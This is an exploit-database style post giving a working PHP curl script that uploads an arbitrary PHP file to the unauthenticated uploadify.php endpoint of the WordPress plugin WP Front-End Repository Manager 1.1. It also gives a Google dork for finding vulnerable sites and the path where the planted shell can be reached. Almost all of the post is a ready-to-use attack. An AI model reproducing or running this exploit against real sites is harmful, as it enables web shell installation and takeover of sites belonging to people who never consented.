WP Front-End Repository Manager Arbitrary File Upload Vulnerability

#############################################################
#Exploit Title                   : WP Front-End Repository Manager Arbitrary File Upload Vulnerability
# Author                           : DaOne aka MockingBird
# Vendor Homepage     : http://wordpress.org/plugins/wp-front-end-repository/
# Download link              : http://downloads.wordpress.org/plugin/wp-front-end-repository.1.1.zip
# Version                         : 1.1
# Category                       : webapps/php
# Google dork                 : inurl:wp-content/plugins/wp-front-end-repository

#############################################################

# Exploit

<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://{target}/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# Shell path: http://{target}/wp-content/plugins/wp-front-end-repository/js/uploadify/{filename}.php

Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity